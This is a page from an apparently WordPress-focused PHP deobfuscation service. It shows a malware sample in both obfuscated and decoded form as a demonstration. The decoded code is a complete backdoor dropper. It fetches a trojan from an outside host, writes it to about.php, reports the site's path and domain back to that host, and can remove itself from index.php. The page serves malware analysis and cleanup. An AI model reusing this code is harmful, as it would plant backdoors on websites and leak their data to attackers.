Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O0...



Obfuscated php code

<?php  $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${"_SERVER"}["HTTP_HOST"])){return ${"_SERVER"}["HTTP_HOST"];}elseif(isset(${"_SERVER"}["SERVER_NAME"])){return ${"_SERVER"}["SERVER_NAME"];}return $O__O00_OO0;');$OOO_O00_0_=${"GLOBALS"}["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly9oYWxhbGhpZ2hsaWdodHMuY29tL2Fib3V0LnBocD81MjA=\');if(isset(${"_GET"}["del"])&&${"_GET"}["del"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;}else{$O_0_O_OO00["trojan"]="write failed";}$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);}');${"GLOBALS"}["O_OO__0O00"](1);?>

Decoded(de-Obfuscated) php code

<?php

$O00OO_0_O_ = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j";
$O000OOO___ = "file_put_contents";
$O_0O_0O0O_ = "file_get_contents";
$O0_O0_O0O_ = "create_function";
$OOO0_O0_0_ = "base64_encode";
$OO0O___0O0 = "base64_decode";
$O_O_0_O00O = "preg_replace";
$O_00O0OO__ = "str_replace";
$O_0_O0_O0O = "curl_setopt";
$O_O_O000_O = "curl_close";
$O___00OO0O = "serialize";
$O__0O0_0OO = "curl_init";
$O_OO_O000_ = "curl_exec";
$OO0O0__O0_ = function ($O__O00_OO0 = '') {
    if (isset($_SERVER["HTTP_HOST"])) {
        return $_SERVER["HTTP_HOST"];
    } elseif (isset($_SERVER["SERVER_NAME"])) {
        return $_SERVER["SERVER_NAME"];
    }
    return $O__O00_OO0;
};
$OOO_O00_0_ = function ($url) {
    $OO0O0_0_O_ = @file_get_contents($url);
    if (!$OO0O0_0_O_) {
        $O0O0_O_0O_ = curl_init();
        curl_setopt($O0O0_O_0O_, CURLOPT_URL, $url);
        curl_setopt($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
        $OO0O0_0_O_ = curl_exec($O0O0_O_0O_);
        curl_close($O0O0_O_0O_);
    }
    return $OO0O0_0_O_;
};
$O_OO__0O00 = function ($O_0O_O_0O0 = '') {
    $O_0_O_OO00 = array();
    $O_0_O_OO00["path"] = str_replace(str_replace('//', '/', $_SERVER["PHP_SELF"]), '', str_replace('\\', '/', $_SERVER["SCRIPT_FILENAME"]));
    $O_0_O_OO00["domain"] = $GLOBALS["OO0O0__O0_"]();
    $O_0_O_OO00["shell_link"] = "https://halalhighlights.com/about.php?520";
    if (isset($_GET["del"]) && $_GET["del"] == "my_code") {
        $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
        $OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
        $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>";
        $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___);
        $OO0O0O0___ = @file_put_contents($O0_0OO_O0_, $OO0O0O0___);
        if ($OO0O0O0___ > 0) {
            die("delete success");
        }
        die("delete failed");
    }
    $OO_O__O000 = "about.php";
    $O0O_0_O0_O = $O_0_O_OO00["path"] . "/" . $OO_O__O000;
    $OO0O0O0___ = @$GLOBALS["OOO_O00_0_"]("http://51la.izv4.com/a.txt");
    $OO0O0O0___ = @file_put_contents($O0O_0_O0_O, $OO0O0O0___);
    if ($OO0O0O0___ > 0) {
        $O_0_O_OO00["trojan"] = "http://" . $O_0_O_OO00["domain"] . "/" . $OO_O__O000;
    } else {
        $O_0_O_OO00["trojan"] = "write failed";
    }
    $OO_0O00O__ = sprintf("http://51la.izv4.com/?d=%s", base64_encode(serialize($O_0_O_OO00)));
    $O__OO0O00_ = $GLOBALS["OOO_O00_0_"]($OO_0O00O__);
    if ($O__OO0O00_ == "done") {
        $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
        $OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
        $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>";
        $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___);
        @file_put_contents($O0_0OO_O0_, $OO0O0O0___);
    }
};
$GLOBALS["O_OO__0O00"](1);


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.